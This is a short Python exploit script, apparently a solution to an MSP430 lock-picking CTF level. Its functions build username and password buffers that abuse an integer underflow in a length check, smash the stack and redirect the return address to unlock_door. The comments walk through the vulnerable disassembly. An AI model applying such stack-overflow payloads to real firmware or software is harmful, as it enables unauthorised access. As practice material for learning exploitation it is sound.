def ub(): u = utils.mk_test_hex(0x63*2) ub = bytearray(unhexlify(u)) #this ends up overwriting the value used to check min length of password #we set it low to ensure we pass, but non-zero to avoid ending the string ub[0x11] = 1 #smash the stack! ub[0x2a:0x2b] = [0x4a, 0x44] return ub
def pb(ub=bytearray('')): ''' Right after the "Please enter your password" prompt, it does some dodgy math to try to figure out the len argument to getsn for the password: 45c8: 3e40 1f00 mov #0x1f, r14 45cc: 0e8b sub r11, r14 45ce: 3ef0 ff01 and #0x1ff, r14 i.e.: r11 == len(ub) == 0x20 r14 = 0x1f r14 -= r11 # whoops! overflow: r14 == 0xffff r14 &= 0x1ff # r14 == 0x1ff ''' plen = 0x1f - 0x20 & 0x1ff pb = bytearray(unhexlify(utils.mk_test_hex(plen*2))) #add the return address for unlock_door pb[4:6] = [0x4c, 0x44] #password must be zero-terminated at 0x11 return pb
def ub(): #0x20 is the max we can get away with u = utils.mk_test_hex(0x20*2) ub = bytearray(unhexlify(u)) return ub